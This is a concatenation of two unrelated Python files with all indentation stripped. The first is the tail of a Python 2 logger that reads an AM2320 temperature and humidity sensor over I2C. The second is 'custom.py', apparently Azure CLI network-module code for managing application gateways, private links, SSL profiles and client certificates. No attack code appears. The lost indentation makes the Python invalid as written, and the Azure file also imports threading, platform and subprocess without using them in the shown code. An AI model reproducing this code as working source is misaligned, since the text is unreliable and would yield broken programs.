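# negative temperatures (sign bit in temp_hi) are not handled by this simple logger.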
while True:
try:
self.__i2c.write_i2c_block_data(address, 0x00, []) # wake the sensor from sleep
except:
pass # by design the sensor does not always ACK the wake-up write
time.sleep(0.001)
try:
self.__i2c.write_i2c_block_data(address,0x03,[0x00,0x04]) # read command
except:
if DEBUG_MODE: printDateMsg("[Error] am2320(1) ")
self.__hum = 0.0 # report 0.0 on read failure
self.__tmp = 0.0
time.sleep(READ_INT)
continue
time.sleep(0.015)
try:
block = self.__i2c.read_i2c_block_data(address,0,6) # receive data
except:
if DEBUG_MODE: printDateMsg("[Error] am2320(2) ")
self.__hum = 0.0 # report 0.0 on read failure
self.__tmp = 0.0
time.sleep(READ_INT)
continue
time.sleep(0.001)
self.__hum = (block[2] << 8 | block[3])/10.0
self.__tmp = (block[4] << 8 | block[5])/10.0
time.sleep(READ_INT)
def __logValue(self):
while True:
time.sleep(LOG_INT)
printDateMsg(self.stringValue())
def getHum(self):
return self.__hum
def getTmp(self):
return self.__tmp
def stringValue(self):
return "湿度: " + str(self.getHum()) + "%, " \
+ "温度: " + str(self.getTmp()) + "℃"
def displayValue(self):
print self.stringValue()
def main_loop():
while True:
thermo.displayValue()
time.sleep(1)
if __name__ == '__main__':
thermo = Thermo()
try:
main_loop()
except KeyboardInterrupt:
print "Keyboard Interrupt"
# finally:
# thermo.stop()
# ============= EOF ======================
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from collections import Counter, OrderedDict
from msrestazure.tools import parse_resource_id, is_valid_resource_id, resource_id
from knack.log import get_logger
from azure.mgmt.trafficmanager.models import MonitorProtocol, ProfileStatus
# pylint: disable=no-self-use,no-member,too-many-lines,unused-argument
from azure.cli.core.commands import cached_get, cached_put, upsert_to_collection, get_property
from azure.cli.core.commands.client_factory import get_subscription_id, get_mgmt_service_client
from azure.cli.core.util import CLIError, sdk_no_wait, find_child_item, find_child_collection
from azure.cli.core.azclierror import InvalidArgumentValueError, RequiredArgumentMissingError, \
UnrecognizedArgumentError, ResourceNotFoundError, CLIInternalError
from azure.cli.core.profiles import ResourceType, supported_api_version
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.command_modules.network.zone_file.parse_zone_file import parse_zone_file
from azure.cli.command_modules.network.zone_file.make_zone_file import make_zone_file
import threading
import time
import platform
import subprocess
logger = get_logger(__name__)
# region Utility methods
def _log_pprint_template(template):
import json
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
def _get_default_name(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, True)
def _get_default_id(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, False)
def _get_default_value(balancer, property_name, option_name, return_name):
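# Helper used to default optional arguments: when the balancer has exactly one
# item in the given collection, return its name (or full resource id); with zero
# or multiple candidates, raise so the caller has to specify the option explicitly.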
values = [x.id for x in getattr(balancer, property_name)]
if len(values) > 1:
raise CLIError("Multiple possible values found for '{0}': {1}\nSpecify '{0}' "
"explicitly.".format(option_name, ', '.join(values)))
if not values:
raise CLIError("No existing values found for '{0}'. Create one first and try "
"again.".format(option_name))
return values[0].rsplit('/', 1)[1] if return_name else values[0]
# endregion
# region Generic list commands
def _generic_list(cli_ctx, operation_name, resource_group_name):
ncf = network_client_factory(cli_ctx)
operation_group = getattr(ncf, operation_name)
if resource_group_name:
return operation_group.list(resource_group_name)
return operation_group.list_all()
def list_vnet(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'virtual_networks', resource_group_name)
def list_express_route_circuits(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'express_route_circuits', resource_group_name)
def create_express_route_auth(cmd, resource_group_name, circuit_name, authorization_name):
ExpressRouteCircuitAuthorization = cmd.get_models('ExpressRouteCircuitAuthorization')
client = network_client_factory(cmd.cli_ctx).express_route_circuit_authorizations
return client.begin_create_or_update(resource_group_name,
circuit_name,
authorization_name,
ExpressRouteCircuitAuthorization())
def list_lbs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'load_balancers', resource_group_name)
def list_nics(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_interfaces', resource_group_name)
def list_nsgs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_security_groups', resource_group_name)
def list_nsg_rules(cmd, resource_group_name, network_security_group_name, include_default=False):
client = network_client_factory(cmd.cli_ctx).network_security_groups
nsg = client.get(resource_group_name, network_security_group_name)
rules = nsg.security_rules
if include_default:
rules = rules + nsg.default_security_rules
return rules
def list_custom_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'custom_ip_prefixes', resource_group_name)
def list_public_ips(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_addresses', resource_group_name)
def list_public_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_prefixes', resource_group_name)
def list_route_tables(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'route_tables', resource_group_name)
def list_application_gateways(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'application_gateways', resource_group_name)
def list_network_watchers(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_watchers', resource_group_name)
# endregion
# region ApplicationGateways
# pylint: disable=too-many-locals
def _is_v2_sku(sku):
return 'v2' in sku
# pylint: disable=too-many-statements
def create_application_gateway(cmd, application_gateway_name, resource_group_name, location=None,
tags=None, no_wait=False, capacity=2,
cert_data=None, cert_password=None, key_vault_secret_id=None,
frontend_port=None, http_settings_cookie_based_affinity='disabled',
http_settings_port=80, http_settings_protocol='Http',
routing_rule_type='Basic', servers=None,
sku=None,
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
subnet='default', subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
connection_draining_timeout=0, enable_http2=None, min_capacity=None, zones=None,
custom_error_pages=None, firewall_policy=None, max_capacity=None,
user_assigned_identity=None,
enable_private_link=False,
private_link_ip_address=None,
private_link_subnet='PrivateLinkDefaultSubnet',
private_link_subnet_prefix='10.0.1.0/24',
private_link_primary=None,
trusted_client_cert=None,
ssl_profile=None,
ssl_profile_id=None,
ssl_cert_name=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_application_gateway_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
sku_tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
http_listener_protocol = 'https' if (cert_data or key_vault_secret_id) else 'http'
private_ip_allocation = 'Static' if private_ip_address else 'Dynamic'
virtual_network_name = virtual_network_name or '{}Vnet'.format(application_gateway_name)
# Build up the ARM template
master_template = ArmTemplateBuilder()
ag_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if subnet_type == 'new':
ag_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix,
enable_private_link=enable_private_link,
private_link_subnet=private_link_subnet,
private_link_subnet_prefix=private_link_subnet_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name, subnet)
if public_ip_address_type == 'new':
ag_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
public_ip_sku = None
if _is_v2_sku(sku):
public_ip_sku = 'Standard'
public_ip_address_allocation = 'Static'
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
None, public_ip_sku, None))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
private_link_subnet_id = None
private_link_name = 'PrivateLinkDefaultConfiguration'
private_link_ip_allocation_method = 'Dynamic'
if enable_private_link:
private_link_subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name,
private_link_subnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
app_gateway_resource = build_application_gateway_resource(
cmd, application_gateway_name, location, tags, sku, sku_tier, capacity, servers, frontend_port,
private_ip_address, private_ip_allocation, cert_data, cert_password, key_vault_secret_id,
http_settings_cookie_based_affinity, http_settings_protocol, http_settings_port,
http_listener_protocol, routing_rule_type, public_ip_id, subnet_id,
connection_draining_timeout, enable_http2, min_capacity, zones, custom_error_pages,
firewall_policy, max_capacity, user_assigned_identity,
enable_private_link, private_link_name,
private_link_ip_address, private_link_ip_allocation_method, private_link_primary,
private_link_subnet_id, trusted_client_cert, ssl_profile, ssl_profile_id, ssl_cert_name)
app_gateway_resource['dependsOn'] = ag_dependencies
master_template.add_variable(
'appGwID',
"[resourceId('Microsoft.Network/applicationGateways', '{}')]".format(
application_gateway_name))
master_template.add_resource(app_gateway_resource)
master_template.add_output('applicationGateway', application_gateway_name, output_type='object')
if cert_password:
master_template.add_secure_parameter('certPassword', cert_password)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'ag_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def update_application_gateway(cmd, instance, sku=None, capacity=None, tags=None, enable_http2=None, min_capacity=None,
custom_error_pages=None, max_capacity=None):
if sku is not None:
instance.sku.tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
try:
if min_capacity is not None:
instance.autoscale_configuration.min_capacity = min_capacity
if max_capacity is not None:
instance.autoscale_configuration.max_capacity = max_capacity
except AttributeError:
instance.autoscale_configuration = {
'min_capacity': min_capacity,
'max_capacity': max_capacity
}
with cmd.update_context(instance) as c:
c.set_param('sku.name', sku)
c.set_param('sku.capacity', capacity)
c.set_param('tags', tags)
c.set_param('enable_http2', enable_http2)
c.set_param('custom_error_configurations', custom_error_pages)
return instance
def create_ag_authentication_certificate(cmd, resource_group_name, application_gateway_name, item_name,
cert_data, no_wait=False):
AuthCert = cmd.get_models('ApplicationGatewayAuthenticationCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_cert = AuthCert(data=cert_data, name=item_name)
upsert_to_collection(ag, 'authentication_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_authentication_certificate(instance, parent, item_name, cert_data):
instance.data = cert_data
return parent
def create_ag_backend_address_pool(cmd, resource_group_name, application_gateway_name, item_name,
servers=None, no_wait=False):
ApplicationGatewayBackendAddressPool = cmd.get_models('ApplicationGatewayBackendAddressPool')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_pool = ApplicationGatewayBackendAddressPool(name=item_name, backend_addresses=servers)
upsert_to_collection(ag, 'backend_address_pools', new_pool, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_address_pool(instance, parent, item_name, servers=None):
if servers is not None:
instance.backend_addresses = servers
return parent
def create_ag_frontend_ip_configuration(cmd, resource_group_name, application_gateway_name, item_name,
public_ip_address=None, subnet=None,
virtual_network_name=None, private_ip_address=None,
private_ip_address_allocation=None, no_wait=False):
ApplicationGatewayFrontendIPConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayFrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if public_ip_address:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address))
else:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address if private_ip_address else None,
private_ip_allocation_method='Static' if private_ip_address else 'Dynamic',
subnet=SubResource(id=subnet))
upsert_to_collection(ag, 'frontend_ip_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_ip_configuration(cmd, instance, parent, item_name, public_ip_address=None,
subnet=None, virtual_network_name=None,
private_ip_address=None):
SubResource = cmd.get_models('SubResource')
if public_ip_address is not None:
instance.public_ip_address = SubResource(id=public_ip_address)
if subnet is not None:
instance.subnet = SubResource(id=subnet)
if private_ip_address is not None:
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'Static'
return parent
def create_ag_frontend_port(cmd, resource_group_name, application_gateway_name, item_name, port,
no_wait=False):
ApplicationGatewayFrontendPort = cmd.get_models('ApplicationGatewayFrontendPort')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_port = ApplicationGatewayFrontendPort(name=item_name, port=port)
upsert_to_collection(ag, 'frontend_ports', new_port, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_port(instance, parent, item_name, port=None):
if port is not None:
instance.port = port
return parent
def create_ag_http_listener(cmd, resource_group_name, application_gateway_name, item_name,
frontend_port, frontend_ip=None, host_name=None, ssl_cert=None,
firewall_policy=None, no_wait=False, host_names=None):
ApplicationGatewayHttpListener, SubResource = cmd.get_models('ApplicationGatewayHttpListener', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not frontend_ip:
frontend_ip = _get_default_id(ag, 'frontend_ip_configurations', '--frontend-ip')
new_listener = ApplicationGatewayHttpListener(
name=item_name,
frontend_ip_configuration=SubResource(id=frontend_ip),
frontend_port=SubResource(id=frontend_port),
host_name=host_name,
require_server_name_indication=True if ssl_cert and host_name else None,
protocol='https' if ssl_cert else 'http',
ssl_certificate=SubResource(id=ssl_cert) if ssl_cert else None,
host_names=host_names
)
if cmd.supported_api_version(min_api='2019-09-01'):
new_listener.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
upsert_to_collection(ag, 'http_listeners', new_listener, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_http_listener(cmd, instance, parent, item_name, frontend_ip=None, frontend_port=None,
host_name=None, ssl_cert=None, firewall_policy=None, host_names=None):
SubResource = cmd.get_models('SubResource')
if frontend_ip is not None:
instance.frontend_ip_configuration = SubResource(id=frontend_ip)
if frontend_port is not None:
instance.frontend_port = SubResource(id=frontend_port)
if ssl_cert is not None:
if ssl_cert:
instance.ssl_certificate = SubResource(id=ssl_cert)
instance.protocol = 'Https'
else:
instance.ssl_certificate = None
instance.protocol = 'Http'
if host_name is not None:
instance.host_name = host_name or None
if cmd.supported_api_version(min_api='2019-09-01'):
if firewall_policy is not None:
instance.firewall_policy = SubResource(id=firewall_policy)
if host_names is not None:
instance.host_names = host_names or None
instance.require_server_name_indication = instance.host_name and instance.protocol.lower() == 'https'
return parent
def assign_ag_identity(cmd, resource_group_name, application_gateway_name,
user_assigned_identity, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity',
'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
user_assigned_identity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
user_assigned_identities_instance = dict()
user_assigned_identities_instance[user_assigned_identity] = user_assigned_identity_instance
identity_instance = ManagedServiceIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance
)
ag.identity = identity_instance
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def remove_ag_identity(cmd, resource_group_name, application_gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
logger.warning("This command will be ignored. The identity doesn't exist.")
ag.identity = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_identity(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
raise CLIError("Please first use 'az network application-gateway identity assign` to init the identity.")
return ag.identity
def add_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
frontend_ip,
private_link_name,
private_link_subnet_name_or_id,
private_link_subnet_prefix=None,
private_link_primary=None,
private_link_ip_address=None,
no_wait=False):
(SubResource, IPAllocationMethod, Subnet,
ApplicationGatewayPrivateLinkConfiguration,
ApplicationGatewayPrivateLinkIpConfiguration) = cmd.get_models(
'SubResource', 'IPAllocationMethod', 'Subnet',
'ApplicationGatewayPrivateLinkConfiguration', 'ApplicationGatewayPrivateLinkIpConfiguration')
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
private_link_config_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=appgw.name,
child_type_1='privateLinkConfigurations',
child_name_1=private_link_name
)
if not any(fic for fic in appgw.frontend_ip_configurations if fic.name == frontend_ip):
raise CLIError("Frontend IP doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == private_link_config_id:
raise CLIError('Frontend IP already references an existing Private Link')
if fic.name == frontend_ip:
break
else:
raise CLIError("Frontend IP doesn't exist")
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
raise CLIError('Private Link name already exists')
# get the virtual network of this application gateway
vnet_name = parse_resource_id(appgw.gateway_ip_configurations[0].subnet.id)['name']
vnet = ncf.virtual_networks.get(resource_group_name, vnet_name)
# prepare the subnet for new private link
for subnet in vnet.subnets:
if subnet.name == private_link_subnet_name_or_id:
raise CLIError('Subnet name already exists')
if subnet.address_prefix == private_link_subnet_prefix:
raise CLIError('Subnet prefix is already in use')
if subnet.address_prefixes and private_link_subnet_prefix in subnet.address_prefixes:
raise CLIError('Subnet prefix is already in use')
if is_valid_resource_id(private_link_subnet_name_or_id):
private_link_subnet_id = private_link_subnet_name_or_id
else:
private_link_subnet = Subnet(name=private_link_subnet_name_or_id,
address_prefix=private_link_subnet_prefix,
private_link_service_network_policies='Disabled')
private_link_subnet_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_name,
child_type_1='subnets',
child_name_1=private_link_subnet_name_or_id
)
vnet.subnets.append(private_link_subnet)
ncf.virtual_networks.begin_create_or_update(resource_group_name, vnet_name, vnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name='PrivateLinkDefaultIPConfiguration',
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
private_link_config = ApplicationGatewayPrivateLinkConfiguration(
name=private_link_name,
ip_configurations=[private_link_ip_config]
)
# associate the private link with the frontend IP configuration
for fic in appgw.frontend_ip_configurations:
if fic.name == frontend_ip:
fic.private_link_configuration = SubResource(id=private_link_config_id)
appgw.private_link_configurations.append(private_link_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name, appgw)
def show_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link
def list_ag_private_link(cmd,
resource_group_name,
application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.private_link_configurations
def remove_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
removed_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
removed_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == removed_private_link.id:
fic.private_link_configuration = None
# the leftover subnet has to be deleted manually:
# rs = parse_resource_id(removed_private_link.ip_configurations[0].subnet.id)
# vnet_resource_group, vnet_name, subnet = rs['resource_group'], rs['name'], rs['child_name_1']
# ncf.subnets.delete(vnet_resource_group, vnet_name, subnet)
appgw.private_link_configurations.remove(removed_private_link)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
# region application-gateway trusted-client-certificates
def add_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
client_cert_data, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
ApplicationGatewayTrustedClientCertificate = cmd.get_models('ApplicationGatewayTrustedClientCertificate')
cert = ApplicationGatewayTrustedClientCertificate(name=client_cert_name, data=client_cert_data)
appgw.trusted_client_certificates.append(cert)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_trusted_client_certificate(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.trusted_client_certificates
def remove_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
appgw.trusted_client_certificates.remove(cert)
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def show_ag_backend_health(cmd, client, resource_group_name, application_gateway_name, expand=None,
protocol=None, host=None, path=None, timeout=None, host_name_from_http_settings=None,
match_body=None, match_status_codes=None, address_pool=None, http_settings=None):
from azure.cli.core.commands import LongRunningOperation
on_demand_arguments = {protocol, host, path, timeout, host_name_from_http_settings, match_body, match_status_codes,
address_pool, http_settings}
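# If any on-demand probe argument was supplied and the API version supports it,
# run an on-demand backend health probe; otherwise fall back to the regular
# backend health operation.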
if on_demand_arguments.difference({None}) and cmd.supported_api_version(min_api='2019-04-01'):
SubResource, ApplicationGatewayOnDemandProbe, ApplicationGatewayProbeHealthResponseMatch = cmd.get_models(
"SubResource", "ApplicationGatewayOnDemandProbe", "ApplicationGatewayProbeHealthResponseMatch")
probe_request = ApplicationGatewayOnDemandProbe(
protocol=protocol,
host=host,
path=path,
timeout=timeout,
pick_host_name_from_backend_http_settings=host_name_from_http_settings
)
if match_body is not None or match_status_codes is not None:
probe_request.match = ApplicationGatewayProbeHealthResponseMatch(
body=match_body,
status_codes=match_status_codes,
)
if address_pool is not None:
if not is_valid_resource_id(address_pool):
address_pool = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendAddressPools',
child_name_1=address_pool
)
probe_request.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
if not is_valid_resource_id(http_settings):
http_settings = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendHttpSettingsCollection',
child_name_1=http_settings
)
probe_request.backend_http_settings = SubResource(id=http_settings)
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health_on_demand(
resource_group_name, application_gateway_name, probe_request, expand))
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health(
resource_group_name, application_gateway_name, expand))
# endregion
# region application-gateway ssl-profile
def add_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, policy_name=None,
policy_type=None, min_protocol_version=None, cipher_suites=None, disabled_ssl_protocols=None,
trusted_client_certificates=None, client_auth_configuration=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
(SubResource,
ApplicationGatewaySslPolicy,
ApplicationGatewayClientAuthConfiguration,
ApplicationGatewaySslProfile) = cmd.get_models('SubResource',
'ApplicationGatewaySslPolicy',
'ApplicationGatewayClientAuthConfiguration',
'ApplicationGatewaySslProfile')
sr_trusted_client_certificates = [SubResource(id=item) for item in
trusted_client_certificates] if trusted_client_certificates else None
ssl_policy = ApplicationGatewaySslPolicy(policy_name=policy_name, policy_type=policy_type,
min_protocol_version=min_protocol_version,
cipher_suites=cipher_suites, disabled_ssl_protocols=disabled_ssl_protocols)
client_auth = ApplicationGatewayClientAuthConfiguration(
verify_client_cert_issuer_dn=client_auth_configuration) if client_auth_configuration else None
ssl_profile = ApplicationGatewaySslProfile(trusted_client_certificates=sr_trusted_client_certificates,
ssl_policy=ssl_policy, client_auth_configuration=client_auth,
name=ssl_profile_name)
appgw.ssl_profiles.append(ssl_profile)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_ssl_profile(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.ssl_profiles
def remove_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
appgw.ssl_profiles.remove(profile)
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
# endregion
def add_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
private_link_primary=False,
private_link_ip_address=None,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
(SubResource, IPAllocationMethod,
ApplicationGatewayPrivateLinkIpConfiguration) = \
cmd.get_models('SubResource', 'IPAllocationMethod',
'ApplicationGatewayPrivateLinkIpConfiguration')
private_link_subnet_id = target_private_link.ip_configurations[0].subnet.id
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name=private_link_ip_name,
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
target_private_link.ip_configurations.append(private_link_ip_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def show_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
target_private_link_ip_config = None
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
target_private_link_ip_config = pic
break
else:
raise CLIError("IP Configuration doesn't exist")
return target_private_link_ip_config
def list_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
